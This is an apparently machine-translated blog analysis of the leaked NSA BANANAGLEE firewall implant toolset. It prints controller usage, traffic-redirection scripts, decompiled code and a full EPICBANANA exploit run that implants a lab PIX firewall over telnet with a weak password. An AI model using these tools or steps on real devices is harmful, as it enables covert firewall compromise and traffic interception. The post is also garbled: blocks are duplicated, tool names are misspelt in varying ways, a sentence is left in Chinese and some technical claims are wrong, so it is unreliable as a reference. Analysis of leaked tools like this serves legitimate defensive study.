Aquaboutic | Focus Security Research | Vulnerability Exploit | POC

 Home

capsaic technology - natural selection laboratory; nsa equation organization bananage toolset analysis

Posted by zura at 2020-03-27
all

Some time ago, the shadow brokers hacked into the equation group of the National Security Agency (NSA) and leaked some of the hacker tools they obtained from the hacker's computer system to the Internet.

This includes a tool set called banagle, which is a non continuous control tool set used to implant Cisco ASA and pix series devices (only resides in memory, and fails after restart). The purpose is to control the devices after obtaining firewall permission. Different modules are used to accomplish specific tasks, such as traffic redirection, traffic capture, etc. Now several key modules are analyzed.

LP

LP is the abbreviation of listening post (it is mentioned in egbl_and_broadcasting.txt and other documents). It is the general control program of the whole banagle tool set, responsible for connecting the firewall, sending control commands and other functions. Its command line parameter usage is as follows:

Usage for ./lp--lp Listening Post IP Address--implant Implant IP Address--idkey Implant ID Key File[--lptimeout] Listening Post Timeout Threshold(Optional)--sport Specify Port to Send Packets From--dport Specify Port to Send Packets To[--bsize] Benign payload size(8-512)multiple of 8(Optional, defaults to 512)[--logdir] Directory to hold the log files created

Usage for ./lp
--lp Listening Post IP Address
--implant Implant IP Address
--idkey Implant ID Key File
[--lptimeout] Listening Post Timeout Threshold(Optional)
--sport Specify Port to Send Packets From
--dport Specify Port to Send Packets To
[--bsize] Benign payload size(8-512)multiple of 8(Optional, defaults to 512)
[--logdir] Directory to hold the log files created

Function of each parameter:

Other parameters are not required.

After connecting to the firewall successfully, LP will enter an internal command control interface, in which control commands can be sent through different command options.

[[email protected] LP]# ./lp --lp 192.168.200.102 --implant 192.168.200.241 --sport 7541 --dport 23 --idkey /root/fw/Firewall/BANANAGLEE/BG2100/Install/JP/temp.key./lp Version [STD]: 3.1.2 (Built: Jan 9 2012 06:33:29)

[[email protected] LP]# ./lp --lp 192.168.200.102 --implant 192.168.200.241 --sport 7541 --dport 23 --idkey /root/fw/Firewal
l/BANANAGLEE/BG2100/Install/JP/temp.key
./lp Version [STD]: 3.1.2 (Built: Jan 9 2012 06:33:29)

############################################Enter "help" or "?" to see the menuBG# ?Session Commands----------------1)Open Session with firewall7)Toggle Logging [currently ON]8)Display Menu9)Close Session with firewall0)Quit ProgramFirewall Information---------------10)Read Interface Info.(Pix Only)11)Read Configuration12)Read Arp TableRaw API Calls-------------20)Read from firewall Memory21)Malloc Memory on firewall22)Free Malloc'd Memory on firewall23)Write to firewall Memory26)Change the uptime on a PIXModules-------30)List Uploadable Modules31)Upload a Module32)Activate a Module33)De-Activate a Module34)Remove Module36)Get List of Uploaded Modules38)Make All Active Modules Persistent39)Remove Persistent Module Data

############################################
Enter "help" or "?" to see the menu

BG# ?

Session Commands
----------------
1)Open Session with firewall
7)Toggle Logging [currently ON]
8)Display Menu
9)Close Session with firewall
0)Quit Program

Firewall Information
---------------
10)Read Interface Info.(Pix Only)
11)Read Configuration
12)Read Arp Table

Raw API Calls
-------------
20)Read from firewall Memory
21)Malloc Memory on firewall
22)Free Malloc'd Memory on firewall
23)Write to firewall Memory
26)Change the uptime on a PIX

Modules
-------
30)List Uploadable Modules
31)Upload a Module
32)Activate a Module
33)De-Activate a Module
34)Remove Module
36)Get List of Uploaded Modules
38)Make All Active Modules Persistent
39)Remove Persistent Module Data

############################################Enter "help" or "?" to see the menu BG# ? Session Commands----------------1)Open Session with firewall7)Toggle Logging [currently ON]8)Display Menu9)Close Session with firewall0)Quit Program Firewall Information---------------10)Read Interface Info.(Pix Only)11)Read Configuration12)Read Arp Table Raw API Calls-------------20)Read from firewall Memory21)Malloc Memory on firewall22)Free Malloc'd Memory on firewall23)Write to firewall Memory26)Change the uptime on a PIX Modules-------30)List Uploadable Modules31)Upload a Module32)Activate a Module33)De-Activate a Module34)Remove Module36)Get List of Uploaded Modules38)Make All Active Modules Persistent39)Remove Persistent Module Data BG#

BG#

The main commands include four categories:

Session command:

Get firewall information command:

Memory operation command:

Module management command:

Because the flash capacity and memory of the firewall system are not as abundant as that of the operating system, barnaglee is designed as a modular tool set, and most of its functions are in the form of modules, which can only be loaded when needed and unloaded when used up, so as to save memory. Here are the main modules.

The modules are stored in the modules directory. Currently, only the relevant modules of pix and ASA system are found in the leaked banagle version. Taking pix module as an example, the module is named by module name version. Exe (bin|mod). Exe is the file on the control side,. Exe.bin is the module file uploaded and loaded into the firewall, and mod is the module description configuration file.

The main modules include: bcandy console management module, which supports opening, closing, activating the console and other functions bpicker persistent installation module. Because banagle is a non persistent control program, which only exists in memory and will fail when the firewall system is restarted, there is a special module for persistent banagle. The function of this module and another module The tool jetplow is similar. BPIE is used to filter and export specific traffic. The most important part of firewall control is to obtain the desired network traffic, but it can not capture all traffic. On the one hand, the data volume is too large to store, on the other hand, it is not conducive to analysis. Therefore, there is a special module to filter the traffic and only get the desired traffic. Bbanjobeacon related module. I don't know the function of this module yet. I guess it's related to wireless. Bmassacre network data related modules can be used to create and manage VPN tunnels, packet redirection, and port address translation. So module is the most important core module among all modules. Bpatrol packet capture module is used to capture packets according to filtering rules. Bfleaflash management module, which is used to read and write flash memory of firewall, may have been deleted in later versions due to stability problems. Bballbios management module, which is used to read and write BIOS of firewall, may be deleted in later version due to stability problem. Busurper upgrade management module, used to upgrade banagle.

Almost all functions of banagle are implemented in the form of modules. All executable programs and scripts in LP directory are basically communication and management tools for different modules.

Analysis of pd-3110

PD ﹣ miniprog-3110 is used to send packet filtering rules to bmassacre module on firewall. It will be called by programs such as PD ﹣ start ﹣ pat.pl-3110 and BG ﹣ redirect.pl-3110.

PD ﹣ start ﹣ pat.pl-3110 is a management tool for port address translation (PAT). The corresponding banagle module is bmassacre module.

PD ﹣ miniprog-3110 is the main program for sending and receiving commands, while PD ﹣ start ﹣ pat.pl-3110 is the program for the user to perform operations. PD ﹣ start ﹣ pat.pl-3110 will call PD ﹣ miniprog-3110 to send and receive commands. The user only needs to execute PD ﹣ start ﹣ pat.pl-3110.

Pd_start_pat.pl-3110 is a Perl script. Its usage is as follows:

Usage: pd_start_pat.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file>[--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number>--attack_ip <attack_ip> --intermediate_ip <intermediate_ip>--attack_int <interface> --target_int <interface> --port_offset <port offset>--trans_timeout <timeout> --pat_timeout <seconds> --attack_port <port>--target_port <port> [--logdir <logdir>]

Usage: pd_start_pat.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file>
[--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number>
--attack_ip <attack_ip> --intermediate_ip <intermediate_ip>
--attack_int <interface> --target_int <interface> --port_offset <port offset>
--trans_timeout <timeout> --pat_timeout <seconds> --attack_port <port>
--target_port <port> [--logdir <logdir>]

--lp <LP ip>IP Address of the LP box--implant <Impant ip>IP Address of the Implanted box--idkey <Implant key file>File containing key information for the implant[--lptimeout <lp timeout>]The amount of time (in seconds) the LP should wait for a response[--bsize <benign size>](Optional) The max packet size for packets traveling between the LP and implant--cmd <command number>The command number of the PD_addRuleHandler in hex--intermediate_ip <ip>IP address of the intermediate machine[--orig_dest_ip <ip>]IP address of the original destination IP for packets coming from the target--attack_ip <ip>IP address of the attack machine--attack_int <ip>Number of the interface that the attack machine is connected to--attack_port <ip>Port to tunnel to on the target machine--target_int <ip>Number of the interface that the target machine is connected to--port_offset <port>First port to use when building the tranlations--trans_timeout <port>Timeout for individual entries in the translation table--pat_timeout <seconds>Overall timeout for the PAT action

--lp <LP ip>
IP Address of the LP box

--implant <Impant ip>
IP Address of the Implanted box

--idkey <Implant key file>
File containing key information for the implant

[--lptimeout <lp timeout>]
The amount of time (in seconds) the LP should wait for a response

[--bsize <benign size>]
(Optional) The max packet size for packets traveling between the LP and implant

--cmd <command number>
The command number of the PD_addRuleHandler in hex

--intermediate_ip <ip>
IP address of the intermediate machine

[--orig_dest_ip <ip>]
IP address of the original destination IP for packets coming from the target

--attack_ip <ip>
IP address of the attack machine

--attack_int <ip>
Number of the interface that the attack machine is connected to

--attack_port <ip>
Port to tunnel to on the target machine

--target_int <ip>
Number of the interface that the target machine is connected to

--port_offset <port>
First port to use when building the tranlations

--trans_timeout <port>
Timeout for individual entries in the translation table

--pat_timeout <seconds>
Overall timeout for the PAT action

--lp <LP ip>IP Address of the LP box --implant <Impant ip>IP Address of the Implanted box --idkey <Implant key file>File containing key information for the implant [--lptimeout <lp timeout>]The amount of time (in seconds) the LP should wait for a response [--bsize <benign size>](Optional) The max packet size for packets traveling between the LP and implant --cmd <command number>The command number of the PD_addRuleHandler in hex --intermediate_ip <ip>IP address of the intermediate machine [--orig_dest_ip <ip>]IP address of the original destination IP for packets coming from the target --attack_ip <ip>IP address of the attack machine --attack_int <ip>Number of the interface that the attack machine is connected to --attack_port <ip>Port to tunnel to on the target machine --target_int <ip>Number of the interface that the target machine is connected to --port_offset <port>First port to use when building the tranlations --trans_timeout <port>Timeout for individual entries in the translation table --pat_timeout <seconds>Overall timeout for the PAT action [--logdir <logdir>](Optional) Directory to store log files in (defaults to .)

[--logdir <logdir>]
(Optional) Directory to store log files in (defaults to .) $pd_mini = sprintf(
"./pd_miniprog-3110 --lp %s --implant %s --idkey %s --sport %s --dport %s ",
$opt_lp, $opt_implant, $opt_idkey, $opt_sport, $opt_dport, );

if ( defined($opt_lptimeout) ) {$pd_mini = sprintf( "%s --lptimeout %s", $pd_mini, $opt_lptimeout );}if ( defined($opt_bsize) ) {$pd_mini = sprintf( "%s --bsize %s", $pd_mini, $opt_bsize );}if ( defined($opt_logdir) ) {$pd_mini = sprintf( "%s --logdir %s", $pd_mini, $opt_logdir );}

if ( defined($opt_lptimeout) ) {
$pd_mini = sprintf( "%s --lptimeout %s", $pd_mini, $opt_lptimeout );
}

if ( defined($opt_bsize) ) {
$pd_mini = sprintf( "%s --bsize %s", $pd_mini, $opt_bsize );
}

if ( defined($opt_logdir) ) {
$pd_mini = sprintf( "%s --logdir %s", $pd_mini, $opt_logdir );
}

if ( defined($opt_lptimeout) ) {$pd_mini = sprintf( "%s --lptimeout %s", $pd_mini, $opt_lptimeout );} if ( defined($opt_bsize) ) {$pd_mini = sprintf( "%s --bsize %s", $pd_mini, $opt_bsize );} if ( defined($opt_logdir) ) {$pd_mini = sprintf( "%s --logdir %s", $pd_mini, $opt_logdir );} print "$pd_mini --cmd $opt_cmd --name add_rule --arg $pat_filt_filename\n";system("$pd_mini --cmd $opt_cmd --name add_rule --arg $pat_filt_filename");

print "$pd_mini --cmd $opt_cmd --name add_rule --arg $pat_filt_filename\n";
system("$pd_mini --cmd $opt_cmd --name add_rule --arg $pat_filt_filename"); int __cdecl PD_addRuleHandler(int a1, unsigned int a2)
{
unsigned __int8 v2; // [email protected]
int result; // [email protected]
int v4; // [email protected]
int v5; // [email protected]
unsigned __int8 v6; // [email protected]

v2 = 0;if ( (a2 <= 7 | a1 == 0) & 1|| (*(_DWORD *)(a1 + 4) = reverse4(*(_DWORD *)(a1 + 4)),v4 = reverse4(*(_DWORD *)a1),*(_DWORD *)a1 = v4,v5 = deserializeDroprule(*(_DWORD *)(a1 + 4), v4),v2 = 0,!v5) ){result = (*(int (__cdecl **)(_DWORD))(**(_DWORD **)OS_VER + 84))(v2);}else{v6 = PD_addRule(v5);result = (*(int (__cdecl **)(_DWORD))(**(_DWORD **)OS_VER + 84))(v6);}return result;}

v2 = 0;
if ( (a2 <= 7 | a1 == 0) & 1
|| (*(_DWORD *)(a1 + 4) = reverse4(*(_DWORD *)(a1 + 4)),
v4 = reverse4(*(_DWORD *)a1),
*(_DWORD *)a1 = v4,
v5 = deserializeDroprule(*(_DWORD *)(a1 + 4), v4),
v2 = 0,
!v5) )
{
result = (*(int (__cdecl **)(_DWORD))(**(_DWORD **)OS_VER + 84))(v2);
}
else
{
v6 = PD_addRule(v5);
result = (*(int (__cdecl **)(_DWORD))(**(_DWORD **)OS_VER + 84))(v6);
}
return result;
}

PD_addRuleHandler first calls deserializeDroprule to process the rules into binary format, and then calls PD_addRule to add binary rules into the internal list. In this way, each time a packet arrives at the firewall, it will first enter banagle for processing, and banagle will filter according to the filtering rules before returning it to the firewall for processing.

BG ﹣ redirector-3110 analysis

Bg-redirector-3110 is a tool for traffic redirection and encryption, which will be called by start-redirector.pl-3110 and stop-redirector.sh-3110. It also works with the BMAS Sacre module of banagle on the firewall.

Where start_redirector.pl-3110 is a Perl script, similar to pd_start_pat.pl-3110, is responsible for receiving commands from users and generating PCAP filtering rule files (Berkley Packet Filter format), and then calling pd_miniprog-3110 to upload the rules to BMASSACRE module of BANANAGLEE on the firewall. A parameter - enc_key is needed to specify the key file for encryption. The key file can be generated by another executable program keygen-3110 in the same directory. RC6 encryption algorithm is used for data stream encryption. Start ﹣ redirector.pl finally calls BG ﹣ redirect.pl-3110 to forward the traffic locally. Bg_redirect.pl-3110 executes two iptables rules on the local machine:

/sbin/iptables -I OUTPUT 1 -s $opt_orig_src_ip -d $opt_clr_tunnel_ip -p $opt_proto -j QUEUE/sbin/iptables -t mangle -I PREROUTING 1 -s $opt_orig_src_ip -d $opt_clr_tunnel_ip -p $opt_proto -j QUEUE

/sbin/iptables -I OUTPUT 1 -s $opt_orig_src_ip -d $opt_clr_tunnel_ip -p $opt_proto -j QUEUE
/sbin/iptables -t mangle -I PREROUTING 1 -s $opt_orig_src_ip -d $opt_clr_tunnel_ip -p $opt_proto -j QUEUE

Put the forwarded data into the mangle table, then call bg_redirector-3110 to encrypt and decrypt the data, and the original encrypted enc_key is still needed. Through reverse analysis, it is found that after bg-redirector-3110 listens to the corresponding port locally, it will call et-encryptcllearpacket and et-encryptencryptedpacket to encrypt and decrypt the data. The encryption algorithm is as follows:

int __cdecl ET_encryptClearPacket(int a1, int a2, __int16 a3, __int16 a4, int a5, int a6){int v6; // [email protected] v7; // [email protected] v8; // [email protected] v9; // [email protected]__int16 v10; // [email protected] v11; // [email protected] v13; // [sp+28h] [bp-64h]@4int v14; // [sp+50h] [bp-3Ch]@6int v15; // [sp+54h] [bp-38h]@7

int __cdecl ET_encryptClearPacket(int a1, int a2, __int16 a3, __int16 a4, int a5, int a6)
{
int v6; // [email protected]
int v7; // [email protected]
int v8; // [email protected]
int v9; // [email protected]
__int16 v10; // [email protected]
int v11; // [email protected]
int v13; // [sp+28h] [bp-64h]@4
int v14; // [sp+50h] [bp-3Ch]@6
int v15; // [sp+54h] [bp-38h]@7

v6 = 0;if ( a1 ){if ( a2 ){if ( *(_DWORD *)(a1 + 4) ){v13 = *(_DWORD *)a1;if ( *(_DWORD *)a1 ){if ( *(_DWORD *)a1 <= 0x20Eu ){memset(&v14, 0, 0x14u);*(_DWORD *)a2 = v13 + 22;v7 = malloc(v13 + 22);*(_DWORD *)(a2 + 4) = v7;v6 = 0;if ( v7 ){memcpy(v7 + 22, *(_DWORD *)(a1 + 4), *(_DWORD *)a1);v8 = *(_DWORD *)(a2 + 4);*(_DWORD *)(v8 + 12) = reverse4(-557122643);*(_WORD *)(v8 + 16) = a3;*(_DWORD *)v8 = a5;*(_WORD *)(v8 + 18) = a4;v9 = *(_DWORD *)a1;*(_WORD *)(v8 + 20) = *(_DWORD *)a1;v10 = reverse2(v9);v11 = *(_DWORD *)a1 + 10;*(_WORD *)(v8 + 20) = v10;SHA1(v8 + 12, v11, &v14);*(_DWORD *)(v8 + 4) = v14;*(_DWORD *)(v8 + 8) = v15;rc6_encrypt(v8 + 12, v8 + 12, v11, a6, v8 + 4);v6 = a2;}}}}}}return v6;}

v6 = 0;
if ( a1 )
{
if ( a2 )
{
if ( *(_DWORD *)(a1 + 4) )
{
v13 = *(_DWORD *)a1;
if ( *(_DWORD *)a1 )
{
if ( *(_DWORD *)a1 <= 0x20Eu )
{
memset(&v14, 0, 0x14u);
*(_DWORD *)a2 = v13 + 22;
v7 = malloc(v13 + 22);
*(_DWORD *)(a2 + 4) = v7;
v6 = 0;
if ( v7 )
{
memcpy(v7 + 22, *(_DWORD *)(a1 + 4), *(_DWORD *)a1);
v8 = *(_DWORD *)(a2 + 4);
*(_DWORD *)(v8 + 12) = reverse4(-557122643);
*(_WORD *)(v8 + 16) = a3;
*(_DWORD *)v8 = a5;
*(_WORD *)(v8 + 18) = a4;
v9 = *(_DWORD *)a1;
*(_WORD *)(v8 + 20) = *(_DWORD *)a1;
v10 = reverse2(v9);
v11 = *(_DWORD *)a1 + 10;
*(_WORD *)(v8 + 20) = v10;
SHA1(v8 + 12, v11, &v14);
*(_DWORD *)(v8 + 4) = v14;
*(_DWORD *)(v8 + 8) = v15;
rc6_encrypt(v8 + 12, v8 + 12, v11, a6, v8 + 4);
v6 = a2;
}
}
}
}
}
}
return v6;
}

It can be seen that SHA1 is used to encrypt the key first, and then RC6 is used to encrypt the data. Finally, when the redirection encryption and decryption work is finished, the user can call stop redirector.sh-3110 to kill the BG redirector-3110 process. The workflow of encryption redirection is as follows:

Implantation of bananage

Banagle is just a non persistent control tool, which needs to be embedded into the firewall system remotely through vulnerabilities and other methods. Among the leaked tools are EPBA, which can be used to implant banagle.

EPBA is implanted by telnet or SSH weak password. Its specific usage is to specify the target IP, target firewall version, protocol (telnet or SSH), port, login user name and password, target system flash capacity (dedicated for pix system) through the command line. Currently supported versions include ASA 711-832 and pix 711-804. The specific attack process is as follows:

[[email protected] EPICBANANA]# python ./epicbanana_2.1.0.1.py -t 192.168.200.241 --proto=telnet --password 12345678 --target_vers=pix721 --mem=128M -p 23===========================EPICBANANA (v2.1.0.1) beginning...target: 192.168.200.241target_vers: pix721memory size: 128Mpayload: BMprotocol: telnet (port 23)send delay: 1.0response timeout: 20.0credentials: username = pix / password = 12345678verbose mode ON===========================building versions files for memory 128M, payload BM, and version pix721make cleanrm -f *.o *_assembler *_loader.py *_loader.s *.pyc highmem.smake 128Mcp highmem_128M.s highmem.smake pix721 PAYLOAD=128M_BM./payload_merge.py pix721_skeleton.s pix721_128M_BM_payload.epba

[[email protected] EPICBANANA]# python ./epicbanana_2.1.0.1.py -t 192.168.200.241 --proto=telnet --password 12345678 --target_vers=pix721 --mem=128M -p 23
===========================
EPICBANANA (v2.1.0.1) beginning...
target: 192.168.200.241
target_vers: pix721
memory size: 128M
payload: BM
protocol: telnet (port 23)
send delay: 1.0
response timeout: 20.0
credentials: username = pix / password = 12345678
verbose mode ON
===========================
building versions files for memory 128M, payload BM, and version pix721
make clean
rm -f *.o *_assembler *_loader.py *_loader.s *.pyc highmem.s
make 128M
cp highmem_128M.s highmem.s
make pix721 PAYLOAD=128M_BM
./payload_merge.py pix721_skeleton.s pix721_128M_BM_payload.epba

pix721_skeleton.s + highmem.s + pix721_128M_BM_payload.epba = pix721_loader.sas --32 -o pix721_loader.o pix721_loader.sgcc -m32 -c -o assembler.o assembler.cas --32 -o util.o util.sgcc -m32 -o pix721_assembler assembler.o util.o pix721_loader.o./pix721_assemblercreating file pix721_loader.pyforbidden bytes found in encoded block[1], try againforbidden bytes found in encoded block[1], try againforbidden bytes found in encoded block[1], try againforbidden bytes found in encoded block[1], try againmask bytes: b1:36; b2:30; b3:6e; b4:63; b5:23; b6:db; b7:41; b8:aa; b9:3e; b10:82; b11:b1; b12:34; b13:7b;cksums: b2:90; b3:b3; b4:a8; b5:e6; b6:46; b7:b5; b8:61; b9:1b; b10:28; b11:e0; b12:90; b13:90;payload preparedinitiating telnet***User Access VerificationPassword:***received password prompt, sending***

pix721_skeleton.s + highmem.s + pix721_128M_BM_payload.epba = pix721_loader.s

as --32 -o pix721_loader.o pix721_loader.s
gcc -m32 -c -o assembler.o assembler.c
as --32 -o util.o util.s
gcc -m32 -o pix721_assembler assembler.o util.o pix721_loader.o
./pix721_assembler
creating file pix721_loader.py
forbidden bytes found in encoded block[1], try again
forbidden bytes found in encoded block[1], try again
forbidden bytes found in encoded block[1], try again
forbidden bytes found in encoded block[1], try again
mask bytes: b1:36; b2:30; b3:6e; b4:63; b5:23; b6:db; b7:41; b8:aa; b9:3e; b10:82; b11:b1; b12:34; b13:7b;
cksums: b2:90; b3:b3; b4:a8; b5:e6; b6:46; b7:b5; b8:61; b9:1b; b10:28; b11:e0; b12:90; b13:90;
payload prepared
initiating telnet
***

User Access Verification

Password:
***
received password prompt, sending
***

pix721_skeleton.s + highmem.s + pix721_128M_BM_payload.epba = pix721_loader.s as --32 -o pix721_loader.o pix721_loader.sgcc -m32 -c -o assembler.o assembler.cas --32 -o util.o util.sgcc -m32 -o pix721_assembler assembler.o util.o pix721_loader.o./pix721_assemblercreating file pix721_loader.pyforbidden bytes found in encoded block[1], try againforbidden bytes found in encoded block[1], try againforbidden bytes found in encoded block[1], try againforbidden bytes found in encoded block[1], try againmask bytes: b1:36; b2:30; b3:6e; b4:63; b5:23; b6:db; b7:41; b8:aa; b9:3e; b10:82; b11:b1; b12:34; b13:7b;cksums: b2:90; b3:b3; b4:a8; b5:e6; b6:46; b7:b5; b8:61; b9:1b; b10:28; b11:e0; b12:90; b13:90;payload preparedinitiating telnet*** User Access Verification Password:***received password prompt, sending*** Type help or '?' for a list of available commands.pixfirewall>***received prompt, we're insending payloadsending command 1/15, len 833received expected error msg, still alivesending command 2/15, len 525received expected error msg, still alivesending command 3/15, len 759received expected error msg, still alivesending command 4/15, len 993received expected error msg, still alivesending command 5/15, len 993received expected error msg, still alivesending command 6/15, len 993received expected error msg, still alivesending command 7/15, len 993received expected error msg, still alivesending command 8/15, len 993received expected error msg, still alivesending command 9/15, len 993received expected error msg, still alivesending command 10/15, len 993received expected error msg, still alivesending command 11/15, len 993received expected error msg, still alivesending command 12/15, len 569received expected error msg, still alivesending command 13/15, len 3received expected error msg, still alivesending command 14/15, len 3received expected error msg, still alivesending command 15/15, len 9received expected error msg, still alivepayload sentwaiting for response from targetno status returned from target, could be an exploit failure, or this is a version where we don't expect a status return

Type help or '?' for a list of available commands.
pixfirewall>
***
received prompt, we're in
sending payload
sending command 1/15, len 833
received expected error msg, still alive
sending command 2/15, len 525
received expected error msg, still alive
sending command 3/15, len 759
received expected error msg, still alive
sending command 4/15, len 993
received expected error msg, still alive
sending command 5/15, len 993
received expected error msg, still alive
sending command 6/15, len 993
received expected error msg, still alive
sending command 7/15, len 993
received expected error msg, still alive
sending command 8/15, len 993
received expected error msg, still alive
sending command 9/15, len 993
received expected error msg, still alive
sending command 10/15, len 993
received expected error msg, still alive
sending command 11/15, len 993
received expected error msg, still alive
sending command 12/15, len 569
received expected error msg, still alive
sending command 13/15, len 3
received expected error msg, still alive
sending command 14/15, len 3
received expected error msg, still alive
sending command 15/15, len 9
received expected error msg, still alive
payload sent
waiting for response from target
no status returned from target, could be an exploit failure, or this is a version where we don't expect a status return

这里针对PIX7.2.1进行虽然最后显示攻击有可能失败了,但是实际却已经植入成功。接下来可以使用BANANAGLEE下的bride-1120工具进行连接。 [[email protected] LP]# ./bride-1120 --lp 192.168.200.102 --implant 192.168.200.241 --sport 7541 --dport 23The source port is: 7541The destination port is: 23The local IP address is: 192.168.200.102Using DAT file from directory ../../Dats/.

[[email protected] LP]# ./bride-1120 --lp 192.168.200.102 --implant 192.168.200.241 --sport 7541 --dport 23
The source port is: 7541
The destination port is: 23
The local IP address is: 192.168.200.102
Using DAT file from directory ../../Dats/.

./bride-1120 Version [STD]: 1.1.2 (Built: Feb 27 2013 13:26:38)

Session Commands
----------------
1) Open Session with firewall
8) Display Menu
0) Quit Program

BANAL RIDE# 1
Session opened with firewall.
D-H Key: 75a31fc2f3330b97b94d436d4fc86489

BANAL RIDE# 8

Session Commands
----------------
4) Remove BANALMONKEY
5) Remove BANANAGLEE
8) Display Menu
9) Close Session with firewall
0) Quit Program

Raw API Calls
-------------
20) Read from firewall Memory
21) Malloc Memory on firewall
22) Free Malloc'd Memory on firewall
23) Write to firewall Memory
24) Get version of Firewall OS

BananaGlee
-------------
30) Write BananaGlee to Memory

./bride-1120 Version [STD]: 1.1.2 (Built: Feb 27 2013 13:26:38) Session Commands----------------1) Open Session with firewall8) Display Menu0) Quit Program BANAL RIDE# 1Session opened with firewall.D-H Key: 75a31fc2f3330b97b94d436d4fc86489 BANAL RIDE# 8 Session Commands----------------4) Remove BANALMONKEY5) Remove BANANAGLEE8) Display Menu9) Close Session with firewall0) Quit Program Raw API Calls-------------20) Read from firewall Memory21) Malloc Memory on firewall22) Free Malloc'd Memory on firewall23) Write to firewall Memory24) Get version of Firewall OS BananaGlee-------------30) Write BananaGlee to Memory BANAL RIDE# 24#################### Firewall OS version# OS VERSION: 7.2(1)

BANAL RIDE# 24
###################
# Firewall OS version
# OS VERSION: 7.2(1)
© 2023